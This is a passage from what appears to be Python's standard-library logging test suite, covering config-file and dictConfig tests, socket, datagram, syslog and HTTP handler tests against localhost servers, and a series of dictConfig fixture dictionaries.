# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config8_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
# Replace single backslash with double backslash in windows
# to avoid unicode error during string formatting
if os.name == "nt":
fn = fn.replace("\\", "\\\\")
config8 = self.config8.format(tempfile=fn)
self.apply_config(config8)
self.apply_config(config8)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def test_logger_disabling(self):
self.apply_config(self.disable_test)
logger = logging.getLogger('some_pristine_logger')
self.assertFalse(logger.disabled)
self.apply_config(self.disable_test)
self.assertTrue(logger.disabled)
self.apply_config(self.disable_test, disable_existing_loggers=False)
self.assertFalse(logger.disabled)
def test_config_set_handler_names(self):
test_config = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
handlers=hand1
[handler_hand1]
class=StreamHandler
formatter=form1
[formatter_form1]
format=%(levelname)s ++ %(message)s
"""
self.apply_config(test_config)
self.assertEqual(logging.getLogger().handlers[0].name, 'hand1')
def test_defaults_do_no_interpolation(self):
"""bpo-33802 defaults should not get interpolated"""
ini = textwrap.dedent("""
[formatters]
keys=default
[formatter_default]
[handlers]
keys=console
[handler_console]
class=logging.StreamHandler
args=tuple()
[loggers]
keys=root
[logger_root]
formatter=default
handlers=console
""").strip()
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.ini')
try:
os.write(fd, ini.encode('ascii'))
os.close(fd)
logging.config.fileConfig(
fn,
defaults=dict(
version=1,
disable_existing_loggers=False,
formatters={
"generic": {
"format": "%(asctime)s [%(process)d] [%(levelname)s] %(message)s",
"datefmt": "[%Y-%m-%d %H:%M:%S %z]",
"class": "logging.Formatter"
},
},
)
)
finally:
os.unlink(fn)
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
server_class = TestTCPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_socket, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SocketHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Semaphore(0)
def tearDown(self):
"""Shutdown the TCP server."""
try:
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
if self.server:
self.server.stop()
finally:
BaseTest.tearDown(self)
def handle_socket(self, request):
conn = request.connection
while True:
chunk = conn.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = conn.recv(slen)
while len(chunk) < slen:
chunk = chunk + conn.recv(slen - len(chunk))
obj = pickle.loads(chunk)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.release()
def test_output(self):
# The log message sent to the SocketHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("tcp")
logger.error("spam")
self.handled.acquire()
logger.debug("eggs")
self.handled.acquire()
self.assertEqual(self.log_output, "spam\neggs\n")
def test_noserver(self):
if self.server_exception:
self.skipTest(self.server_exception)
# Avoid timing-related failures due to SocketHandler's own hard-wired
# one-second timeout on socket.create_connection() (issue #16264).
self.sock_hdlr.retryStart = 2.5
# Kill the server
self.server.stop()
# The logging call should try to connect, which should fail
try:
raise RuntimeError('Deliberate mistake')
except RuntimeError:
self.root_logger.exception('Never sent')
self.root_logger.error('Never sent, either')
now = time.time()
self.assertGreater(self.sock_hdlr.retryTime, now)
time.sleep(self.sock_hdlr.retryTime - now + 0.001)
self.root_logger.error('Nor this')
def _get_temp_domain_socket():
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.sock')
os.close(fd)
# just need a name - file can't be present, or we'll get an
# 'address already in use' error.
os.remove(fn)
return fn
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSocketHandlerTest(SocketHandlerTest):
"""Test for SocketHandler with unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixStreamServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SocketHandlerTest.setUp(self)
def tearDown(self):
SocketHandlerTest.tearDown(self)
support.unlink(self.address)
class DatagramHandlerTest(BaseTest):
"""Test for DatagramHandler."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a DatagramHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.DatagramHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
if self.server:
self.server.stop()
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
slen = struct.pack('>L', 0) # length of prefix
packet = request.packet[len(slen):]
obj = pickle.loads(packet)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.set()
def test_output(self):
# The log message sent to the DatagramHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("udp")
logger.error("spam")
self.handled.wait()
self.handled.clear()
logger.error("eggs")
self.handled.wait()
self.assertEqual(self.log_output, "spam\neggs\n")
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixDatagramHandlerTest(DatagramHandlerTest):
"""Test for DatagramHandler using Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
DatagramHandlerTest.setUp(self)
def tearDown(self):
DatagramHandlerTest.tearDown(self)
support.unlink(self.address)
class SysLogHandlerTest(BaseTest):
"""Test for SysLogHandler using UDP."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a SysLogHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sl_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SysLogHandler
if isinstance(server.server_address, tuple):
self.sl_hdlr = hcls((server.server_address[0], server.port))
else:
self.sl_hdlr = hcls(server.server_address)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sl_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the server."""
try:
if self.server:
self.server.stop()
if self.sl_hdlr:
self.root_logger.removeHandler(self.sl_hdlr)
self.sl_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
self.log_output = request.packet
self.handled.set()
def test_output(self):
if self.server_exception:
self.skipTest(self.server_exception)
# The log message sent to the SysLogHandler is properly received.
logger = logging.getLogger("slh")
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
self.handled.clear()
self.sl_hdlr.append_nul = False
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m')
self.handled.clear()
self.sl_hdlr.ident = "h\xe4m-"
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m')
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SysLogHandlerTest.setUp(self)
def tearDown(self):
SysLogHandlerTest.tearDown(self)
support.unlink(self.address)
@unittest.skipUnless(socket_helper.IPV6_ENABLED,
'IPv6 support required for this test.')
class IPv6SysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with IPv6 host."""
server_class = TestUDPServer
address = ('::1', 0)
def setUp(self):
self.server_class.address_family = socket.AF_INET6
super(IPv6SysLogHandlerTest, self).setUp()
def tearDown(self):
self.server_class.address_family = socket.AF_INET
super(IPv6SysLogHandlerTest, self).tearDown()
class HTTPHandlerTest(BaseTest):
"""Test for HTTPHandler."""
def setUp(self):
"""Set up an HTTP server to receive log messages, and a HTTPHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.handled = threading.Event()
def handle_request(self, request):
self.command = request.command
self.log_data = urlparse(request.path)
if self.command == 'POST':
try:
rlen = int(request.headers['Content-Length'])
self.post_data = request.rfile.read(rlen)
except:
self.post_data = None
request.send_response(200)
request.end_headers()
self.handled.set()
def test_output(self):
# The log message sent to the HTTPHandler is properly received.
logger = logging.getLogger("http")
root_logger = self.root_logger
root_logger.removeHandler(self.root_logger.handlers[0])
for secure in (False, True):
addr = ('localhost', 0)
if secure:
try:
import ssl
except ImportError:
sslctx = None
else:
here = os.path.dirname(__file__)
localhost_cert = os.path.join(here, "keycert.pem")
sslctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslctx.load_cert_chain(localhost_cert)
context = ssl.create_default_context(cafile=localhost_cert)
else:
sslctx = None
context = None
self.server = server = TestHTTPServer(addr, self.handle_request,
0.01, sslctx=sslctx)
server.start()
server.ready.wait()
host = 'localhost:%d' % server.server_port
secure_client = secure and sslctx
self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob',
secure=secure_client,
context=context,
credentials=('foo', 'bar'))
self.log_data = None
root_logger.addHandler(self.h_hdlr)
for method in ('GET', 'POST'):
self.h_hdlr.method = method
self.handled.clear()
msg = "sp\xe4m"
logger.error(msg)
self.handled.wait()
self.assertEqual(self.log_data.path, '/frob')
self.assertEqual(self.command, method)
if method == 'GET':
d = parse_qs(self.log_data.query)
else:
d = parse_qs(self.post_data.decode('utf-8'))
self.assertEqual(d['name'], ['http'])
self.assertEqual(d['funcName'], ['test_output'])
self.assertEqual(d['msg'], [msg])
self.server.stop()
self.root_logger.removeHandler(self.h_hdlr)
self.h_hdlr.close()
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assertTruesurvival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assertTruesurvival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
os.close(fd)
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf-8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf-8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
# Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
# Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
# Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
warnings.filterwarnings("always", category=UserWarning)
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = stream.getvalue()
h.close()
self.assertGreater(s.find("UserWarning: I'm warning you...\n"), 0)
# See if an explicit file uses the original implementation
a_file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
a_file, "Dummy line")
s = a_file.getvalue()
a_file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
def test_warnings_no_handlers(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
# confirm our assumption: no loggers are set
logger = logging.getLogger("py.warnings")
self.assertEqual(logger.handlers, [])
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42)
self.assertEqual(len(logger.handlers), 1)
self.assertIsInstance(logger.handlers[0], logging.NullHandler)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
class myCustomFormatter:
def __init__(self, fmt, datefmt=None):
pass
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config 7 does not define compiler.parser but defines compiler.lexer
# so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8a disables existing loggers
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
# As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config0, but with properties
config14 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'.': {
'foo': 'bar',
'terminator': '!\n',
}
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
out_of_order = {
"version": 1,
"formatters": {
"mySimpleFormatter": {
"format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s",
"style": "$"
}
},
"handlers": {
"fileGlobal": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "mySimpleFormatter"
},
"bufferGlobal": {
"class": "logging.handlers.MemoryHandler",
"capacity": 5,
"formatter": "mySimpleFormatter",
"target": "fileGlobal",
"level": "DEBUG"
}
},
"loggers": {
"mymodule": {
"level": "DEBUG",
"handlers": ["bufferGlobal"],
"propagate": "true"
}
}
}
# Configuration with custom logging.Formatter subclass as '()' key and 'validate' set to False
custom_formatter_class_validate = {
'version': 1,
'formatters': {
'form1': {
'()': __name__ + '.ExceptionFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom logging.Formatter subclass as 'class' key and 'validate' set to False
custom_formatter_class_validate2 = {
'version': 1,
'formatters': {
'form1': {
'class': __name__ + '.ExceptionFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom class that is not inherited from logging.Formatter
custom_formatter_class_validate3 = {
'version': 1,
'formatters': {
'form1': {
'class': __name__ + '.myCustomFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom function and 'validate' set to False
custom_formatter_with_function = {
'version': 1,
'formatters': {
'form1': {
'()': formatFunc,
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
